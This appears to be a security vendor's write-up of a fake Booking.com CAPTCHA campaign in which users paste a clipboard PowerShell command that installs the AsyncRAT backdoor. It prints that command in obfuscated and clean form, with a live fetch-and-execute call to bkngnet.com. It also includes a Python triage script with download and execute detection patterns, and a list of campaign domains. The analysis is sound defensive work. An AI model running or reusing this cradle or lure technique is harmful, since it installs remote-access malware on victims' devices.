Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains


Cybercriminals are running a campaign that lures users from gaming websites, social media platforms and sponsored advertisements to counterfeit websites posing as Booking.com. Research indicates that roughly 40% of travelers book their trips through online searches, which gives scammers a large pool of potential victims.

The first signs of this campaign appeared in mid-May, and the redirect destination has changed every two to three days since.

Clicking these links leads to a familiar tactic: a fraudulent CAPTCHA page silently writes a command to the user's clipboard and then talks the user into pasting and running it, so that victims infect their own devices.

Image: Chrome warning message (caption: Chrome warning may lack clarity)

Chrome does show a warning, but what it means, and why it matters, is not obvious to the average user.

Malwarebytes’ Browser Guard users receive a more explicit warning:

Image: Clipboard warning from Malwarebytes Browser Guard

The warning prompts the user with a message regarding clipboard access: “Hey, did you just copy something? Your clipboard was accessed from this website. Ensure you trust the source before using this information.”

Do not dismiss these warnings. However familiar the site looks, a CAPTCHA that asks you to paste something into a system dialog is a red flag: no legitimate verification works that way.

The content placed on the clipboard looks like gibberish to most people; an experienced user will recognize it as a PowerShell command and see the danger it poses.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v

The attackers use mixed casing, quote interruptions and meaningless variable names to hide the command's purpose from both users and simple pattern matching. None of it survives parsing: Windows strips the quote pairs when it splits the command line, and PowerShell accepts any unambiguous abbreviation of its parameters (so -Nopro stands for -NoProfile and /w h for -WindowStyle Hidden). The command that actually runs is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious CAPTCHA form instructs the user to paste the clipboard content into the Windows Run dialog and run the command outlined above. When Browser Guard detects potentially harmful commands in the clipboard, it prefixes the copied content with a warning phrase, rendering it an invalid command and preventing infection.

If an unprotected user follows the instructions, the command starts a hidden PowerShell process that retrieves further PowerShell code from bkngnet[.]com and executes it without writing it to disk. That code downloads and executes a file named ckjg.exe, which in turn downloads and executes a file named Stub.exe, detected by Malwarebytes as Backdoor.AsyncRAT.
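To show how much of the disguise is cosmetic, here is an added Python example (written for this write-up, not Malwarebytes' tooling) that performs the normalization described above on the clipboard payload, then flags the download-and-execute pattern and pulls out the contacted domain. The sample command lines are constructed for the demonstration; the parameter table is a subset of powershell.exe's switches and the quote-stripping shortcut is a triage heuristic, both noted in the comments.

```python
"""Normalise a quote-interrupted powershell.exe command line and triage it.

Added example, not Malwarebytes' code: reproduces the de-obfuscation steps
described in the write-up and flags the download-and-execute cradle.
"""
import json
import re

# Constructed samples: the clipboard payload from the write-up (en dash and quote
# interruptions preserved) and a benign Run-dialog command for contrast.
OBFUSCATED = (
    'pOwERsheLl \u2013N"O"p"rO" /w h -C"Om"ManD "$b"a"np = \'b"kn"g"n"et.com\';'
    '$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v'
)
BENIGN = 'powershell -NoProfile -Command "Get-Date"'

# powershell.exe accepts any unambiguous prefix of its parameter names and either
# '-' or '/' as the switch character; -WindowStyle values abbreviate the same way.
# Subset of the real switch list, enough for this lure.
PARAMS = ["NoProfile", "NoLogo", "NoExit", "NonInteractive", "WindowStyle",
          "Command", "EncodedCommand", "ExecutionPolicy", "File"]
WINDOW_STYLES = ["Normal", "Hidden", "Minimized", "Maximized"]

DOWNLOAD = re.compile(r"\b(Invoke-RestMethod|irm|Invoke-WebRequest|iwr|curl|wget|"
                      r"DownloadString|DownloadFile)\b", re.I)
EXECUTE = re.compile(r"\b(Invoke-Expression|iex|Start-Process|saps)\b", re.I)
DOMAIN = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}\b", re.I)


def expand(token, choices):
    """Return the single choice that token is a case-insensitive prefix of, else None."""
    hits = [c for c in choices if c.lower().startswith(token.lower())]
    return hits[0] if len(hits) == 1 else None


def normalize(cmdline):
    """Undo mixed casing, Unicode dashes, quote interruptions and abbreviations.

    Dropping every '"' mirrors what the Windows argument parser does to quote
    pairs glued inside one token. It is a heuristic, not CommandLineToArgvW:
    a script body that itself used double quotes would lose them here.
    """
    s = cmdline.replace("\u2013", "-").replace("\u2014", "-").replace('"', "")
    tokens = s.split()
    out = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        name = expand(tok[1:], PARAMS) if tok[:1] in "-/" and len(tok) > 1 else None
        if i == 0 and tok.lower() in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
            out.append(tok.lower())
        elif name:
            out.append("-" + name)
            if name == "WindowStyle" and i + 1 < len(tokens):
                i += 1
                out.append(expand(tokens[i], WINDOW_STYLES) or tokens[i])
            elif name in ("Command", "EncodedCommand", "File"):
                # Everything after these switches is the payload: keep it verbatim.
                out.append(" ".join(tokens[i + 1:]))
                break
        else:
            out.append(tok)
        i += 1
    return " ".join(out)


def triage(cmdline):
    """Return the normalised command plus the indicators that mark a ClickFix cradle."""
    norm = normalize(cmdline)
    domains = sorted({d.lower() for d in DOMAIN.findall(norm)
                      if not d.lower().endswith((".exe", ".dll", ".ps1", ".bat"))})
    findings = {
        "normalized": norm,
        "hidden_window": "-WindowStyle Hidden" in norm,
        "download": bool(DOWNLOAD.search(norm)),
        "execute": bool(EXECUTE.search(norm)),
        "domains": domains,
    }
    findings["verdict"] = ("download-and-execute cradle"
                           if findings["download"] and findings["execute"] else "no cradle")
    return findings


if __name__ == "__main__":
    print(json.dumps(triage(OBFUSCATED), indent=2))
    print(json.dumps(triage(BENIGN), indent=2))
```

The same triage applies to process-creation telemetry (Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled) and, during incident response, to the Run dialog history that Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. A powershell.exe child of explorer.exe whose command line normalizes to a hidden-window Invoke-RestMethod plus Invoke-Expression cradle is the fingerprint of this lure.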

Backdoor.AsyncRAT is a remote access Trojan that lets its operator monitor and control the infected device remotely, putting the user's data and privacy at risk.

Indicators of Compromise (IOCs)

The domains and subdomains associated with this campaign rotate quickly, changing every few days; the (booking.) prefix marks the subdomain used to imitate Booking.com. Recently active examples include:

  • (booking.)chargesguestescenter[.]com
  • (booking.)badgustrewivers[.]com
  • (booking.)property-paids[.]com
  • (booking.)rewiewqproperty[.]com
  • (booking.)extranet-listing[.]com
  • (booking.)guestsalerts[.]com
  • (booking.)gustescharge[.]com
  • kvhandelregis[.]com
  • patheer-moreinfo[.]com
  • guestalerthelp[.]com
  • rewiewwselect[.]com
  • hekpaharma[.]com
  • bkngnet[.]com
  • partnervrft[.]com

Image: Malwarebytes blocks download from bkngnet[.]com

Best Practices for Protection

To safeguard against these and similar threats, consider the following protective measures:

  • Never run commands that a website tells you to paste into the Run dialog, a terminal or PowerShell, whoever the site claims to be.
  • Implement a robust anti-malware solution capable of blocking malicious websites and scripts.
  • Utilize a browser extension that blocks harmful domains and phishing attempts.
  • Disable JavaScript in your browser when visiting untrusted websites.

The page writes to the clipboard with the JavaScript call document.execCommand('copy'); the newer navigator.clipboard.writeText() does the same job, so any defense has to cover both. Disabling JavaScript stops clipboard hijacking, but it also breaks many legitimate sites, so a practical compromise is to use separate browsers (or browser profiles) for trusted and untrusted browsing.

Protecting your digital identity is paramount in the face of rising cybersecurity threats. Employ comprehensive measures, including identity protection solutions, to maintain the security and privacy of your personal information.